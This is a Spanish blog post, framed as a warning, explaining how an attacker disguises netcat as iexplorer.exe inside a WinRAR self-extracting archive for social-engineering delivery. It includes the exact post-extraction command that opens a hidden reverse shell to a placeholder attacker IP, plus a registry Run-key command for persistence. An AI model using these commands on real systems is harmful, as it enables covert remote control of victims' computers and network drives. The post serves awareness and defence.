Ya habéis visto como hay que desconfiar un poco, y especialmente de los autoextraibles. Más o menos ocurre así:Alguien nos ha cogido paquete. Tranquilo, no es culpa tuya, igual es que no le gusta tu equipo de fútbol. Se cree superior. Incluso puede ser superior ya que tiene demasiado tiempo libre. Además abusa de nuestra confianza. Nos dice algo como..."Oye, te paso esto a ver que te parece". Y tu vas con toda tu buena intención para que te cuele un troyano.
En el enlace que mostraba en el post anterior se ve como actúa el asaltante. Como a muchos os da pereza hacer clic hacía otro sitio, reproduzco con mis palabras como funciona el tema:
1.-Primero elige la víctima. A veces ni eso. Deja el troyano preparadito para que alguien pique.
2.-Luego un poco de ingenieria social para parecer un amigo que ofrece algo interesante (juego, software, etc.).
3.-Coge el netcat y lo transforma para que el atacado no llegue a sospechar. Por una parte le cambia el nombre y lo llama iexplorer.exe. Luego utiliza el ResHacker para cambiarle el icono. Lógicamente le pone el icono del iexplorer.
4.-Utiliza el winrar para preparar un archivo .sfx que es autoextraible.
4.1.-Pone como carpeta de extracción esta:
= %homedrive%%homepath%\update
En una carpeta de nombre update no llama demasiado la atención un fichero llamado iexplorer.exe.
4.1.-Hay un lugar para indicar que tras la extracción se ejecute algo. Ahí indica que se ejecute iexplorer.exe -d -e cmd.exe ip-atacante 80
La opción -d está disponible en el netcat para Windows. Lo que hace es que netcat pueda seguir a la escucha aunque no se mantenga abierta la ventana del interprete de comandos cmd.exe. Vamos, para evitar que el atacado se entere.
4.2.-En otro sitio se pone lo que hay que ejecutar antes de la extración. Aquí añade una entrada en el registro para que el troyano se ejecute cada vez que se arranca el PC:
= %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe ip-atacante 80" /f > nul
Lo que hace es ejecutar el reg add que fuerza luego la ejecución del troyano en cada arranque. La redirección a nul es para que el atacante no vea el reg add.
Bueno, ya veis lo fácil que es que te cuelen un troyano. Y una vez colado puede acceder a la máquina incluidas las unidades de red todas las veces que quiera.
Ahora la pregunta lógica, yo tengo antivirus ¿estoy seguro? En el caso que hemos visto el antivirus debería darse cuenta que el fichero iexplorer.exe tiene un patrón muy coincidente (mejor dicho exacto) con el netcat y advertirnos de que es un posible troyano, pero quien sabe. Lo probaré el lunes porque en este Kubuntu no tengo antivirus.
Por si acaso es mejor que busquemos los troyanos nosotros mismos. Mañana digo cómo, que es sábado y salgo a cenar.
Saludos.
No hay comentarios:
Publicar un comentario